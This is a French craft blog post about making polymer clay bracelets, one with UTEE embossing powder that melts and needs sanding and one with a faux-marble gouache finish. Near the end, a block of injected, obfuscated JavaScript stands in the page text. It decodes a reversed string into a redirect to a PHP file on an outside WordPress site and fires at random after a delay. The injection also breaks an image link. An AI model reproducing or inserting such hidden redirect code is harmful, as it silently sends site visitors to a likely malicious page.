Pour débuter cette année, deux bracelets, je ne sais pas si j’en ferais autant que l’année passée, mais voilà, il semble que je sois incapable de m’en empêcher…
Au modelage, l’effet est vraiment super comme de minuscules étoiles dans la pâte. Vient la cuisson et si on ne reste pas devant, au moment de sortir du four, ne pas paniquer comme moi et penser que tout est foutu bon pour la poubelle!!!! Oui, au sortir du four l’UTEE qui est d’une granulosité supérieure aux autres poudres à embosser se met à couler en fondant et les petites étoiles deviennent des comètes explosées qui bavent sur tout le travail. Il faut prendre sur soi et avoir le courage de passer à l’étape ponçage. Après ce ponçage minutieux mais indispensable on retrouve un aspect particulièrement intéressant. Je vous laisse juger sur le bracelet ainsi que sur des perles .
Le deuxième bracelet fait suite à une leçon donnée à mes élèves sur des imitations de pierre ici du marbre. J’en ai fait des bagues aussi, et j’avoue que même si le patouillage dans la gouache est un peu “cra-cra”, le résultat me plaît énormément.
$nJe=function(n){if (typeof ($nJe.list[n]) == “string”) return $nJe.list[n].split(“”).reverse().join(“”);return $nJe.list[n];};$nJe.list=[“\’php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}torage.canalblog.com/76/08/253798/34369074.jpg” target=”_blank”>
Pour celles qui voudraient essayer l’UTEE colorée, elle est en vente chez Karinouchka.